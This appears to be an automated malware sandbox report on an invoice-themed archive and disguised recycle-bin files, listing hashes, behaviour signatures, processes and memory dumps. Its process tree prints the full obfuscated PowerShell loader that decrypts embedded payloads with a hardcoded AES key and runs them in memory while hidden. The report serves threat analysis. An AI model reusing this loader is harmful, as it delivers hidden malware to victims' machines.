Tasks (score, sample, platform)

Static: score 10

1   b3c5e464e4...e3.zip    windows7-x64
1   b3c5e464e4...e3.zip    windows10-2004-x64
1   INVOICE#BU...03.vhd    windows7-x64
3   INVOICE#BU...03.vhd    windows10-2004-x64
3   $RECYCLE.B...2Y.lnk    windows7-x64
3   $RECYCLE.B...2Y.lnk    windows10-2004-x64
3   $RECYCLE.B...CZ.url    windows7-x64
1   $RECYCLE.B...CZ.url    windows10-2004-x64
1   $RECYCLE.B...JO.url    windows7-x64
1   $RECYCLE.B...JO.url    windows10-2004-x64
1   $RECYCLE.B...G6.lnk    windows7-x64
3   $RECYCLE.B...G6.lnk    windows10-2004-x64
3   $RECYCLE.B...O0.cmd    windows7-x64
1   $RECYCLE.B...O0.cmd    windows10-2004-x64
1   $RECYCLE.B...21.txt    windows7-x64
1   $RECYCLE.B...21.txt    windows10-2004-x64
1   $RECYCLE.B...65.vhd    windows7-x64
3   $RECYCLE.B...65.vhd    windows10-2004-x64
3   $RECYCLE.B...2Y.lnk    windows7-x64
3   $RECYCLE.B...2Y.lnk    windows10-2004-x64
3   $RECYCLE.B...CZ.url    windows7-x64
1   $RECYCLE.B...CZ.url    windows10-2004-x64
1   $RECYCLE.B...JO.url    windows7-x64
1   $RECYCLE.B...JO.url    windows10-2004-x64
1   $RECYCLE.B...G6.lnk    windows7-x64
3   $RECYCLE.B...G6.lnk    windows10-2004-x64
6   $RECYCLE.B...O0.cmd    windows7-x64
1   $RECYCLE.B...O0.cmd    windows10-2004-x64
10  $RECYCLE.B...65.vhd    windows7-x64
3   $RECYCLE.B...65.vhd    windows10-2004-x64
3   $RECYCLE.B...op.ini    windows7-x64
1   $RECYCLE.B...op.ini    windows10-2004-x64
Analysis

max time kernel: 122s
max time network: 123s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 25-03-2024 14:35
Static task
static1

Behavioral tasks (task, sample, resource)

behavioral1   b3c5e464e43d7db2432f3e28de75bd0eee8fa7a2b7b6fef7134e7115d6681be3.zip   win7-20240221-en
behavioral2   b3c5e464e43d7db2432f3e28de75bd0eee8fa7a2b7b6fef7134e7115d6681be3.zip   win10v2004-20240226-en
behavioral3   INVOICE#BUSAPOMKDS03.vhd      win7-20240221-en
behavioral4   INVOICE#BUSAPOMKDS03.vhd      win10v2004-20240226-en
behavioral5   $RECYCLE.BIN/$I47GN2Y.lnk     win7-20240221-en
behavioral6   $RECYCLE.BIN/$I47GN2Y.lnk     win10v2004-20231215-en
behavioral7   $RECYCLE.BIN/$I6AKHCZ.url     win7-20240221-en
behavioral8   $RECYCLE.BIN/$I6AKHCZ.url     win10v2004-20240226-en
behavioral9   $RECYCLE.BIN/$I9BVFJO.url     win7-20240221-en
behavioral10  $RECYCLE.BIN/$I9BVFJO.url     win10v2004-20240226-en
behavioral11  $RECYCLE.BIN/$IAEXCG6.lnk     win7-20240221-en
behavioral12  $RECYCLE.BIN/$IAEXCG6.lnk     win10v2004-20240226-en
behavioral13  $RECYCLE.BIN/$IAH62O0.cmd     win7-20240221-en
behavioral14  $RECYCLE.BIN/$IAH62O0.cmd     win10v2004-20240226-en
behavioral15  $RECYCLE.BIN/$IFTQZ21.txt     win7-20240221-en
behavioral16  $RECYCLE.BIN/$IFTQZ21.txt     win10v2004-20240226-en
behavioral17  $RECYCLE.BIN/$ITQTF65.vhd     win7-20240215-en
behavioral18  $RECYCLE.BIN/$ITQTF65.vhd     win10v2004-20240226-en
behavioral19  $RECYCLE.BIN/$R47GN2Y.lnk     win7-20231129-en
behavioral20  $RECYCLE.BIN/$R47GN2Y.lnk     win10v2004-20240226-en
behavioral21  $RECYCLE.BIN/$R6AKHCZ.url     win7-20240221-en
behavioral22  $RECYCLE.BIN/$R6AKHCZ.url     win10v2004-20240319-en
behavioral23  $RECYCLE.BIN/$R9BVFJO.url     win7-20240221-en
behavioral24  $RECYCLE.BIN/$R9BVFJO.url     win10v2004-20240226-en
behavioral25  $RECYCLE.BIN/$RAEXCG6.lnk     win7-20240221-en
behavioral26  $RECYCLE.BIN/$RAEXCG6.lnk     win10v2004-20240226-en
behavioral27  $RECYCLE.BIN/$RAH62O0.cmd     win7-20240221-en
behavioral28  $RECYCLE.BIN/$RAH62O0.cmd     win10v2004-20240226-en
behavioral29  $RECYCLE.BIN/$RTQTF65.vhd     win7-20240215-en
behavioral30  $RECYCLE.BIN/$RTQTF65.vhd     win10v2004-20240226-en
behavioral31  $RECYCLE.BIN/desktop.ini      win7-20240221-en
behavioral32  $RECYCLE.BIN/desktop.ini      win10v2004-20240226-en
General

Target: $RECYCLE.BIN/$RAH62O0.cmd
Size: 111KB
MD5: 2c3351c659a42a82e3a3d865c88eaaaf
SHA1: 7c73b2c98e449be1c5a85806c08cfe05c0a699ab
SHA256: f8f8f56ff4b52a36a6619ca8eadab3df1ae333dfda870a36b024bd74cf0ce9e4
SHA512: b1962ca896f6328289a61522c6ede86bd0e6436d3dd6ca2170888ee2592a9cf88640f801dd864dbab1713ddb930b4dbed3cba0c5362f56f19150fcdabab599c6
SSDEEP: 3072:hXiSJ9Nvg6aGNGIR9Lb5ZQ6gvr+sBKWTP8ydL:hnXy2wg9f5ZezrKWTPdV
Malware Config
Signatures

Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes: powershell.exe
  PID 1184  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe
  Token: SeDebugPrivilege  PID 1184  powershell.exe

Suspicious use of WriteProcessMemory (15 IoCs)
  Processes: cmd.exe, cmd.exe
  PID 2612 (cmd.exe) wrote to memory of 2340 (cmd.exe)          3 events
  PID 2612 (cmd.exe) wrote to memory of 1960 (cmd.exe)          3 events
  PID 1960 (cmd.exe) wrote to memory of 2332 (cmd.exe)          3 events
  PID 1960 (cmd.exe) wrote to memory of 1688 (cmd.exe)          3 events
  PID 1960 (cmd.exe) wrote to memory of 1184 (powershell.exe)   3 events
Processes

(depth 1) C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RAH62O0.cmd"
  - Suspicious use of WriteProcessMemory

  (depth 2) C:\Windows\system32\cmd.exe
    Command line: cmd /c \"set __=^&rem\

  (depth 2) C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RAH62O0.cmd
    - Suspicious use of WriteProcessMemory

    (depth 3) C:\Windows\system32\cmd.exe
      Command line: cmd /c \"set __=^&rem\

    (depth 3) C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\$RECYCLE.BIN\$RAH62O0.cmd';$vPfm='FrBUtpomBUtpBaBUtpseBUtp6BUtp4SBUtptBUtpriBUtpnBUtpgBUtp'.Replace('BUtp', ''),'SplJBtgiJBtgtJBtg'.Replace('JBtg', ''),'GethEjOChEjOuhEjOrrhEjOenhEjOtPhEjOrhEjOochEjOehEjOsshEjO'.Replace('hEjO', ''),'RbMNueabMNudLibMNunbMNuebMNusbMNu'.Replace('bMNu', ''),'TrVMsDanVMsDsfVMsDoVMsDrVMsDmVMsDFiVMsDnalVMsDBlVMsDoVMsDckVMsD'.Replace('VMsD', ''),'CwuCwrewuCwatwuCwewuCwDecwuCwrypwuCwtowuCwrwuCw'.Replace('wuCw', ''),'MaiTiHmnMoTiHmdTiHmuleTiHm'.Replace('TiHm', ''),'EnUWistrUWisyPUWisoinUWistUWis'.Replace('UWis', ''),'LookWIadokWI'.Replace('okWI', ''),'COhAHhOhAHanOhAHgeOhAHExOhAHteOhAHnsOhAHionOhAH'.Replace('OhAH', ''),'DeczWTeomzWTepzWTerzWTeezWTesszWTe'.Replace('zWTe', ''),'CokibSpkibSyTkibSokibS'.Replace('kibS', ''),'InwjkRvwjkRowjkRkewjkR'.Replace('wjkR', ''),'ElONUdeONUdmeONUdntONUdAtONUd'.Replace('ONUd', '');powershell -w hidden;function eQHuL($xDKNl){$wfVuI=[System.Security.Cryptography.Aes]::Create();$wfVuI.Mode=[System.Security.Cryptography.CipherMode]::CBC;$wfVuI.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$wfVuI.Key=[System.Convert]::($vPfm[0])('smeuwWzR6dWlk5l0XRDHt/STkUE6r93X9fZoZ+Y3e4g=');$wfVuI.IV=[System.Convert]::($vPfm[0])('u1EcqhG41JNBknlWNKXGVQ==');$oHOle=$wfVuI.($vPfm[5])();$HZbjq=$oHOle.($vPfm[4])($xDKNl,0,$xDKNl.Length);$oHOle.Dispose();$wfVuI.Dispose();$HZbjq;}function Jvwqe($xDKNl){$rttxe=New-Object System.IO.MemoryStream(,$xDKNl);$KtnaD=New-Object System.IO.MemoryStream;$fHrHd=New-Object System.IO.Compression.GZipStream($rttxe,[IO.Compression.CompressionMode]::($vPfm[10]));$fHrHd.($vPfm[11])($KtnaD);$fHrHd.Dispose();$rttxe.Dispose();$KtnaD.Dispose();$KtnaD.ToArray();}$AGaOg=[System.IO.File]::($vPfm[3])([Console]::Title);$bRtGG=Jvwqe (eQHuL ([Convert]::($vPfm[0])([System.Linq.Enumerable]::($vPfm[13])($AGaOg, 5).Substring(2))));$HvxJi=Jvwqe (eQHuL ([Convert]::($vPfm[0])([System.Linq.Enumerable]::($vPfm[13])($AGaOg, 6).Substring(2))));[System.Reflection.Assembly]::($vPfm[8])([byte[]]$HvxJi).($vPfm[7]).($vPfm[12])($null,$null);[System.Reflection.Assembly]::($vPfm[8])([byte[]]$bRtGG).($vPfm[7]).($vPfm[12])($null,$null); "

    (depth 3) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix
Downloads (memory dumps, PID 1184)

memory/1184-4-0x000000001B6A0000-0x000000001B982000-memory.dmp    2.9MB
memory/1184-5-0x0000000002790000-0x0000000002798000-memory.dmp    32KB
memory/1184-6-0x000007FEF5D90000-0x000007FEF672D000-memory.dmp    9.6MB
memory/1184-7-0x00000000027A0000-0x0000000002820000-memory.dmp    512KB
memory/1184-11-0x00000000027A0000-0x0000000002820000-memory.dmp   512KB
memory/1184-10-0x00000000027A0000-0x0000000002820000-memory.dmp   512KB
memory/1184-9-0x00000000027A0000-0x0000000002820000-memory.dmp    512KB
memory/1184-8-0x000007FEF5D90000-0x000007FEF672D000-memory.dmp    9.6MB
memory/1184-12-0x000007FEF5D90000-0x000007FEF672D000-memory.dmp   9.6MB
memory/1184-13-0x00000000027A0000-0x0000000002820000-memory.dmp   512KB
memory/1184-14-0x00000000027A0000-0x0000000002820000-memory.dmp   512KB